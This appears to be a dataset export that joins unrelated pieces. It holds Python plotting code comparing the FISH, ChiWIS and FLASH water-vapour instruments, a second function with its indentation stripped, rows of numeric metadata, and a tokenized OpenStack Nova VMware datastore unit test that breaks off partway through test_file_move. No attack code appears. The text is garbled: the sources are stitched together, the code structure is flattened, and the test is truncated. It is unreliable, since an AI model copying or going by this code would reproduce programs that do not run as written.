    dat['CLOUDY'] = ((dat['NICE'] > 0) | (dat['MASBR'] >= 1.2)).astype(int)
    # extend the cloudy flag forward by up to maxlag[i] samples per flight
    for i,f in enumerate(flno):
        for lag in np.arange(1,maxlag[i]):
            dat.loc[(dat['FLIGHT'] == f),'CLOUDY'] = np.maximum(dat.loc[(dat['FLIGHT'] == f),'CLOUDY'],
                                dat[(dat['FLIGHT'] == f)].shift(periods=lag, fill_value=0.0)['CLOUDY'])
    # add ascent/descent flag
    # flag samples with |vertical velocity| > 10 m/s (20-sample rolling mean) or below 12 km
    dz = (dat['ALT'] - dat.shift(periods=1)['ALT'])*1e3
    dt = dat['TIME'] - dat.shift(periods=1)['TIME']
    vert = np.abs(dz / dt)
    vert_avg = vert.rolling(window=20).mean()
    dat['ASCENT_FLAG'] = ((vert_avg > 10) | (dat['ALT'] < 12)).astype(int)
    # add chiwis flag
    # ChiWIS data are trusted only for 30-45 hPa cell pressure and FLAG == 0
    dat['CELL_FLAG'] = ((dat['PRES_CELL'] < 30.0) | (dat['PRES_CELL'] > 45.0) | (dat['FLAG'] == 1)).astype(int)
    # FL7 dive flag
    dat['F7_DIVE'] = ((dat['FLIGHT'] == 7) & (dat['TIME'] > 19.9e3) & (dat['TIME'] < 20.2e3)).astype('int')
    fig,axes = plt.subplots(figsize=(20,10),ncols=3,nrows=2,constrained_layout=True)
    plt.rcParams.update({"font.size":22})
    axused = axes.flatten()
    # panels 0-2: scatter (top row); panels 3-5: 2-D histograms (bottom row)
    for a,ax in enumerate(axused):
        if a < 3:
            # inset showing the full 2-100 ppmv range on the top-row panels
            axin = ax.inset_axes([2,7,3,3], transform=ax.transData)
            axin.yaxis.set_label_position("right")
            axin.yaxis.tick_right()
            axin.plot([2,100],[2,100],"k-")
        # plot diagonal lines
        # 1:1 line plus +/-10% (dashed) and +/-20% (dotted) envelopes
        ax.plot([2,10],[2,10],"k-")
        if a > -1:
            ax.plot([0,12],[0,12*1.1],"k--")
            ax.plot([0,12],[0,12*0.9],"k--")
            ax.plot([0,12],[0,12*1.2],"k:")
            ax.plot([0,12],[0,12*0.8],"k:")
        # regression
        # run the regression twice: all data (<=100 ppmv) and stratospheric (<=10 ppmv);
        # the printed statistics for the i==1 pass use the <=10 ppmv subset
        for i,h2ocut in enumerate([100,10]):
            datx = dat[(dat['ASCENT_FLAG'] == 0) & (dat['FLH2O'] <= h2ocut)]
            if a == 0:
                dat1 = datx[(datx['CLOUDY'] == 0) & (datx['FIH2O'] <= h2ocut)]
                x = dat1['FIH2O']
                y = dat1['FLH2O']
                title = "a"
            if a == 1:
                dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_FLAG'] == 0) & (datx['H2O'] <= h2ocut)]
                x = dat1['H2O']
                y = dat1['FLH2O']
                title = "b"
            if a == 2:
                dat1 = datx[(datx['CLOUDY'] == 1) & (datx['CELL_FLAG'] == 0) & (datx['F7_DIVE'] == 0) & (datx['H2O'] <= h2ocut)]
                x = dat1['H2O']
                y = dat1['FLH2O']
                title = "c"
            if a == 3:
                dat1 = datx[(datx['CLOUDY'] == 0) & (datx['FIH2O'] <= h2ocut)]
                x = dat1['FIH2O']
                y = dat1['FLH2O']
                title = "d"
            if a == 4:
                dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_FLAG'] == 0) & (datx['H2O'] <= h2ocut)]
                x = dat1['H2O']
                y = dat1['FLH2O']
                title = "e"
            if a == 5:
                dat1 = datx[(datx['CLOUDY'] == 1) & (datx['CELL_FLAG'] == 0) & (datx['F7_DIVE'] == 0) & (datx['H2O'] <= h2ocut)]
                x = dat1['H2O']
                y = dat1['FLH2O']
                title = "f"
            mask = ~np.isnan(x) & ~np.isnan(y)
            slope, intercept, rvalue, pvalue, se = stats.linregress(x[mask],y[mask])
            # percent bias of the x-instrument relative to FLASH
            bias = (x[mask] - y[mask]) / y[mask] * 100.0
            absbias = np.abs(bias)
            meanbias = np.mean(bias)
            if a < 3:
                print(title)
                print(h2ocut, a, "r2=",rvalue**2)
                print("mean bias = ", meanbias, "%")
                if i == 1:
                    w = np.where(absbias <= 10.0)[0]
                    print(np.round(len(w)/len(absbias) * 100.0), "< 10% diff")
                    w = np.where(absbias <= 20.0)[0]
                    print(np.round(len(w)/len(absbias) * 100.0), "< 20% diff")
                print()
        ax.set_title(title,weight="bold",loc="left")
        # annotations use the statistics from the last (<=10 ppmv) pass
        if a < 3:
            ax.set_title("bias={:.2f}%, $r^2=${:.3f}".format(meanbias, rvalue**2),loc="right",fontsize=20)
        else:
            ax.text(7.6,2.2,"N={}".format(len(x[mask])))
        # plot
        if a == 0:
            dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0)]
            x = np.array(dat1['FIH2O'])
            y = np.array(dat1['FLH2O'])
            fi = np.array(dat1['FLIGHT'])
            # shuffle so no flight's points systematically overplot another's
            p = np.random.permutation(len(x))
            x, y, fi = x[p], y[p], fi[p]
            ylabel = r"FLASH H$_2$O (ppmv)"
        if a == 1:
            dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_FLAG'] == 0)]
            x = np.array(dat1['H2O'])
            y = np.array(dat1['FLH2O'])
            fi = np.array(dat1['FLIGHT'])
            p = np.random.permutation(len(x))
            x, y, fi = x[p], y[p], fi[p]
            ylabel = r"FLASH H$_2$O (ppmv)"
        if a == 2:
            dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 1) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 0)]
            x = np.array(dat1['H2O'])
            y = np.array(dat1['FLH2O'])
            fi = np.array(dat1['FLIGHT'])
            p = np.random.permutation(len(x))
            x, y, fi = x[p], y[p], fi[p]
            # flight-7 dive points are shown separately as open circles
            dat3a = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 1) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 1)]
            xa = dat3a['H2O']
            ya = dat3a['FLH2O']
            fia = np.array(dat3a['FLIGHT'])
            ylabel = r"FLASH H$_2$O (ppmv)"
        if a < 3:
            ax.scatter(x,y,20,c=colors[fi-1])
            axin.scatter(x,y,5,c=colors[fi-1])
            if a == 2:
                ax.scatter(xa,ya,50,facecolors='none',edgecolors=colors[fia-1])
                axin.scatter(xa,ya,10,facecolors='none',edgecolors=colors[fia-1])
        if a == 3:
            dat3 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0)]
            x = dat3['FIH2O']
            y = dat3['FLH2O']
            # histogram settings defined here are reused by panels 4 and 5
            # (relies on the sequential loop order over axused)
            vmin, vmax = 1, 100
            bins = [80,80]
            r = [[2,10],[2,10]]
            cmin = 1e-5
            m = ax.hist2d(x,y,bins=bins,range=r,
                          cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
                          vmin=vmin,vmax=vmax,cmin=cmin)
            xlabel = r"FISH H$_2$O (ppmv)"
            ylabel = r"FLASH H$_2$O (ppmv)"
        if a == 4:
            dat3 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 0)]
            x = dat3['H2O']
            y = dat3['FLH2O']
            m = ax.hist2d(x,y,bins=bins,range=r,
                          cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
                          vmin=vmin,vmax=vmax,cmin=cmin)
            xlabel = r"ChiWIS H$_2$O (ppmv)"
            ylabel = r"FLASH H$_2$O (ppmv)"
        if a == 5:
            dat3 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 1) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 0)]
            x = dat3['H2O']
            y = dat3['FLH2O']
            m = ax.hist2d(x,y,bins=bins,range=r,
                          cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
                          vmin=vmin,vmax=vmax,cmin=cmin)
            plt.colorbar(m[3], ax=ax, ticks=[vmin, 3, 30, vmax], label="counts")
            xlabel = r"ChiWIS H$_2$O (ppmv)"
            ylabel = r"FLASH H$_2$O (ppmv)"
        if a == 0:
            # off-screen points create one legend handle per flight
            for fi in flno:
                ax.scatter([-1],[-1],20,c=colors[fi-1], label="F"+str(fi))
        if a > 2:
            ax.set_xlabel(xlabel)
        if a == 0 or a == 3:
            ax.set_ylabel(ylabel)
        ax.set_xlim([2,10])
        ax.set_ylim([2,10])
        ax.grid()
        if a < 3:
            axin.set_xticks([25,50,75]); axin.set_yticks([25,50,75])
            axin.set_xlim(2,100), axin.set_ylim([2,100])
            axin.grid(which='both',linestyle=':')
    plt.figtext(0.33,1.06,"Clear-sky", va="center", ha="center", size=25, weight="bold")
    plt.figtext(0.78,1.06,"In-cloud", va="center", ha="center", size=25, weight="bold")
    plt.figtext(0.175,1.02,"FISH vs. FLASH", va="center", ha="center", size=25, weight="bold")
    plt.figtext(0.48,1.02,"ChiWIS vs. FLASH", va="center", ha="center", size=25, weight="bold")
    plt.figtext(0.78,1.02,"ChiWIS vs. FLASH", va="center", ha="center", size=25, weight="bold")
    axused[0].legend(loc=4, ncol=3, frameon=True,
                 labelspacing=0.1, handletextpad=0.1, columnspacing=0.1,
                 borderpad = 0.2, borderaxespad = 0.4,
                 markerscale=2.0, fontsize=20, title_fontsize=20)
    plt.savefig("./Paper-Figures/fig2-scatter-h2o-hist6.png",dpi=300,bbox_inches="tight")
    plt.show()
# Purpose: build data-quality flags on `dat` (presumably a pandas DataFrame --
# TODO confirm against caller) and draw a 2x2 panel figure comparing ChiWIS
# water vapour ('H2O') against FLASH water vapour ('FLH2O') for clear-sky
# points, split by chamber ("cell") pressure regime: nominal 30-45 mbar vs.
# the out-of-range 20-30 mbar regime. Saves the figure to
# ./Paper-Figures/supp-scatter-h2o-hist-oor.png.
# NOTE(review): the indentation of this function was stripped by the dataset
# export, so the nesting shown here is flat; the comments below record the
# apparent structure, but the code bytes are left exactly as found.
# Relies on module-level names defined elsewhere in the file: flno, maxlag,
# colors, cmap, stats, mcolors, np, plt.
def h2o_pt_by_pt_whist_oor(dat):
# add cloudy flag
# CLOUDY = 1 where ice was detected (NICE > 0) or backscatter ratio
# MASBR >= 1.2; the per-flight loop below then propagates the flag forward
# by up to maxlag[i] samples (shift moves earlier CLOUDY values onto later
# rows), so points shortly after a cloud encounter also count as cloudy.
dat['CLOUDY'] = ((dat['NICE'] > 0) | (dat['MASBR'] >= 1.2)).astype(int)
for i,f in enumerate(flno):
for lag in np.arange(1,maxlag[i]):
dat.loc[(dat['FLIGHT'] == f),'CLOUDY'] = np.maximum(dat.loc[(dat['FLIGHT'] == f),'CLOUDY'],
dat[(dat['FLIGHT'] == f)].shift(periods=lag, fill_value=0.0)['CLOUDY'])
# add ascent/descent flag
# Vertical speed from finite differences of ALT (factor 1e3 suggests ALT is
# in km and dz in m -- TODO confirm units); flag points where the 20-sample
# rolling-mean |dz/dt| exceeds 10 or altitude is below 12.
dz = (dat['ALT'] - dat.shift(periods=1)['ALT'])*1e3
dt = dat['TIME'] - dat.shift(periods=1)['TIME']
vert = np.abs(dz / dt)
vert_avg = vert.rolling(window=20).mean()
dat['ASCENT_FLAG'] = ((vert_avg > 10) | (dat['ALT'] < 12)).astype(int)
# add chiwis flag
# CELL_GOOD: nominal cell-pressure window (30-45 mbar); CELL_LOW: the
# out-of-range window (20-30 mbar) that this supplementary figure examines.
# Both additionally require the instrument FLAG to be 0.
dat['CELL_GOOD'] = ((dat['PRES_CELL'] > 30.0) & (dat['PRES_CELL'] < 45.0) & (dat['FLAG'] == 0)).astype(int)
dat['CELL_LOW'] = ((dat['PRES_CELL'] > 20.0) & (dat['PRES_CELL'] < 30.0) & (dat['FLAG'] == 0)).astype(int)
# FL7 dive flag
# Marks the flight-7 dive segment (TIME in 19.9e3..20.2e3) for exclusion.
dat['F7_DIVE'] = ((dat['FLIGHT'] == 7) & (dat['TIME'] > 19.9e3) & (dat['TIME'] < 20.2e3)).astype('int')
fig,axes = plt.subplots(figsize=(13,9),ncols=2,nrows=2,constrained_layout=True)
plt.rcParams.update({"font.size":22})
axused = axes.flatten()
# Panels by index a: 0/"a" scatter at good cell pressure, 1/"b" scatter at
# low cell pressure, 2/"c" 2-D histogram at good, 3/"d" 2-D histogram at low.
for a,ax in enumerate(axused):
# Top-row scatter panels get an inset axis covering the full 2-100 ppmv range.
if a < 2:
axin = ax.inset_axes([2,7,3,3], transform=ax.transData)
axin.yaxis.set_label_position("right")
axin.yaxis.tick_right()
axin.plot([2,100],[2,100],"k-")
# plot diagonal lines
# 1:1 reference line plus +/-10% (dashed) and +/-20% (dotted) envelopes.
ax.plot([2,10],[2,10],"k-")
# NOTE(review): `a > -1` is always true here -- presumably a leftover from a
# version that drew the envelopes on a subset of panels only.
if a > -1:
ax.plot([0,12],[0,12*1.1],"k--")
ax.plot([0,12],[0,12*0.9],"k--")
ax.plot([0,12],[0,12*1.2],"k:")
ax.plot([0,12],[0,12*0.8],"k:")
# regression
# Fit ChiWIS vs. FLASH and compute the mean relative bias, once per H2O
# cutoff (<= 100 ppmv, then <= 10 ppmv).
for i,h2ocut in enumerate([100,10]):
datx = dat[(dat['ASCENT_FLAG'] == 0) & (dat['FLH2O'] <= h2ocut)]
if a == 0:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_GOOD'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "a"
if a == 1:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_LOW'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "b"
if a == 2:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_GOOD'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "c"
if a == 3:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_LOW'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "d"
# Drop NaNs before regressing; bias = (x - y)/y, i.e. ChiWIS relative to
# FLASH, reported in percent.
mask = ~np.isnan(x) & ~np.isnan(y)
slope, intercept, rvalue, pvalue, se = stats.linregress(x[mask],y[mask])
bias = (x[mask] - y[mask]) / y[mask]
meanbias = np.mean(bias) * 100.0
if a < 2:
print(title)
print(h2ocut, a, "r2=",rvalue**2)
print("mean bias = ", meanbias, "%")
ax.set_title(title,weight="bold",loc="left")
# Scatter panels show bias/r^2 in the title; histogram panels annotate N.
if a < 2:
ax.set_title("bias={:.2f}%, $r^2=${:.3f}".format(meanbias, rvalue**2),loc="right",fontsize=20)
else:
ax.text(7.5,2.2,"N={}".format(len(x[mask])))
# plot
# Scatter panels (a, b): points are randomly permuted so no single flight
# systematically plots on top of the others.
if a == 0:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_GOOD'] == 1)]
x = np.array(dat1['H2O'])
y = np.array(dat1['FLH2O'])
fi = np.array(dat1['FLIGHT'])
p = np.random.permutation(len(x))
x, y, fi = x[p], y[p], fi[p]
ylabel = r"clear-sky FLASH H$_2$O"
ax.text(3, 11.2, "cell pressure$\geq 30$mbar")
if a == 1:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_LOW'] == 1)]
x = np.array(dat1['H2O'])
y = np.array(dat1['FLH2O'])
fi = np.array(dat1['FLIGHT'])
p = np.random.permutation(len(x))
x, y, fi = x[p], y[p], fi[p]
ax.text(2.5, 11.2, "$20 \leq$cell pressure$\leq 30$mbar")
if a < 2:
ax.scatter(x,y,20,c=colors[fi-1])
axin.scatter(x,y,5,c=colors[fi-1])
# Histogram panels (c, d): PowerNorm(gamma=0.3) stretches the colour scale to
# make low-count bins visible; cmin=1e-5 leaves empty bins unfilled.
if a == 2:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_GOOD'] == 1)]
x = dat1['H2O']
y = dat1['FLH2O']
vmin, vmax = 1, 100
bins = [80,80]
r = [[2,10],[2,10]]
cmin = 1e-5
m = ax.hist2d(x,y,bins=bins,range=r,
cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
vmin=vmin,vmax=vmax,cmin=cmin)
xlabel = r"clear-sky ChiWIS H$_2$O"
ylabel = r"clear-sky FLASH H$_2$O"
# Panel d reuses vmin/vmax/bins/r/cmin set in the a == 2 branch, so it
# depends on the panels being visited in order.
if a == 3:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_LOW'] == 1)]
x = dat1['H2O']
y = dat1['FLH2O']
m = ax.hist2d(x,y,bins=bins,range=r,
cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
vmin=vmin,vmax=vmax,cmin=cmin)
xlabel = r"clear-sky ChiWIS H$_2$O"
plt.colorbar(m[3], ax=ax, ticks=[vmin, 3, 30, vmax], label="counts")
# Dummy off-axes points (at [-1],[-1], outside the 2-10 view) create one
# legend entry per flight.
if a == 0:
for fi in flno:
ax.scatter([-1],[-1],20,c=colors[fi-1], label="F"+str(fi))
ax.set_xlim([2,10])
ax.set_ylim([2,10])
ax.grid()
# Inset cosmetics for panels that have one.
# NOTE(review): guard is `a < 3` here, but insets are only created when
# a < 2 -- presumably a copy-over from the companion figure; verify that
# panel 2 does not hit a stale `axin`.
if a < 3:
axin.set_xticks([25,50,75]); axin.set_yticks([25,50,75])
axin.set_xlim(2,100), axin.set_ylim([2,100])
axin.grid(which='both',linestyle=':')
axused[0].legend(loc=4, ncol=3, frameon=True,
labelspacing=0.1, handletextpad=0.1, columnspacing=0.1,
borderpad = 0.2, borderaxespad = 0.4,
markerscale=2.0, fontsize=20, title_fontsize=20)
# Shared axis labels for the whole 2x2 grid, placed just outside the figure.
fig.text(0.48, -0.05, r"clear-sky ChiWIS H$_2$O (ppmv)", ha='center')
fig.text(-0.05, 0.5, r"clear-sky FLASH H$_2$O (ppmv)", va='center', rotation='vertical')
plt.rcParams.update({"font.size":22})
plt.savefig("./Paper-Figures/supp-scatter-h2o-hist-oor.png",dpi=300,bbox_inches="tight")
plt.show() | 42 | 128 | 0.451307 | 2,151 | 15,834 | 3.270572 | 0.122269 | 0.015778 | 0.019332 | 0.029566 | 0.880028 | 0.870362 | 0.85231 | 0.843923 | 0.828998 | 0.820611 | 0 | 0.076997 | 0.347101 | 15,834 | 377 | 129 | 42 | 0.603502 | 0.013326 | 0 | 0.794788 | 0 | 0 | 0.12512 | 0.005574 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006515 | false | 0 | 0.022801 | 0 | 0.029316 | 0.029316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
289f9c4f8f15d130c7f5f900bed324dcfd164bd7 | 44,980 | py | Python | nova/tests/unit/virt/vmwareapi/test_ds_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_ds_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_ds_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2014 VMware, Inc.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'re'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'units'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
op|'.'
name|'objects'
name|'import'
name|'datastore'
name|'as'
name|'ds_obj'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'ds_util'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|DsUtilTestCase
name|'class'
name|'DsUtilTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'DsUtilTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'api_retry_count'
op|'='
number|'1'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|tearDown
dedent|''
name|'def'
name|'tearDown'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'DsUtilTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'tearDown'
op|'('
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datacenter_ref
dedent|''
name|'def'
name|'test_get_datacenter_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|')'
name|'as'
name|'call_method'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'get_datacenter_ref'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|'"datacenter"'
op|')'
newline|'\n'
name|'call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'self'
op|'.'
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"FindByInventoryPath"'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|'.'
name|'vim'
op|'.'
name|'service_content'
op|'.'
name|'searchIndex'
op|','
nl|'\n'
name|'inventoryPath'
op|'='
string|'"datacenter"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_delete
dedent|''
dedent|''
name|'def'
name|'test_file_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'DeleteDatastoreFile_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path'"
op|','
name|'name'
op|')'
newline|'\n'
name|'datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'datacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'datacenter'
op|')'
newline|'\n'
name|'return'
string|"'fake_delete_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'file_delete'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
name|'ds_path'
op|','
string|"'fake-dc-ref'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_delete_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_copy
dedent|''
dedent|''
name|'def'
name|'test_file_copy'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'CopyDatastoreFile_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'src_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path/src_file'"
op|','
name|'src_name'
op|')'
newline|'\n'
name|'src_dc_ref'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-src-dc-ref'"
op|','
name|'src_dc_ref'
op|')'
newline|'\n'
name|'dst_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path/dst_file'"
op|','
name|'dst_name'
op|')'
newline|'\n'
name|'dst_dc_ref'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dst-dc-ref'"
op|','
name|'dst_dc_ref'
op|')'
newline|'\n'
name|'return'
string|"'fake_copy_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'src_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|','
string|"'src_file'"
op|')'
newline|'\n'
name|'dst_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|','
string|"'dst_file'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'file_copy'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
name|'str'
op|'('
name|'src_ds_path'
op|')'
op|','
string|"'fake-src-dc-ref'"
op|','
nl|'\n'
name|'str'
op|'('
name|'dst_ds_path'
op|')'
op|','
string|"'fake-dst-dc-ref'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_copy_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_move
dedent|''
dedent|''
name|'def'
name|'test_file_move'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
